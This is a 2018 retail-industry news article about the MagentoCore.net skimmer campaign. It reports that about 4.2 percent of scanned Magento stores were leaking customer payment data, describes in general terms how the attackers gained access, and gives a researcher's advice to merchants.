4.2 percent of all Magento Stores Globally Leaking Payment and Customer Data

Natasha Sholl By Natasha Sholl | 04 Sep 2018

Thousands of Magento sites are reportedly infected with malware, stealing customer data and turning them into ‘zombie money machines.’

Security researcher Willem de Groot scanned websites running Magento shopping cart software and shockingly found that thousands run a skimmer script that captures form input data. “Online skimming…has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer,” he wrote. “In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.”

Scans also revealed over 100 .com.au infested sites. Yet the true number of local sites impacted by the malware could run much higher given that not all Australian sites actually have .au domain names.

A malware scan of about 220,000 sites globally showed that 4.2 percent were leaking payment and customer data. Site operators that aren’t patching their Magento scripts are leaving them open to malicious script injection. “The MagentoCore skimmers gain illicit access to the control panel of an e-commerce site, often with brute force techniques (automatically trying lots of passwords, sometimes for months). Once they succeed, an embedded piece of Javascript is added to the HTML template,” De Groot explained. “This script records keystrokes from unsuspecting customers and sends everything in real-time to the ‘magentocore.net’ server, registered in Moscow.”

Brands are reportedly hijacked at a pace of 50 to 60 per day, with those hacked including multi-million dollar, publicly traded companies.

De Groot suggested that merchants identify how hackers may access sites through analysing backend logs and closing all means of unauthorised access at the same time.

Never miss our best stories. Sign up for Power Retail’s free weekly newsletter and find our daily stories on FacebookTwitter, LinkedIn, and Instagram.

0 Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

[class^="wpforms-"]
[class^="wpforms-"]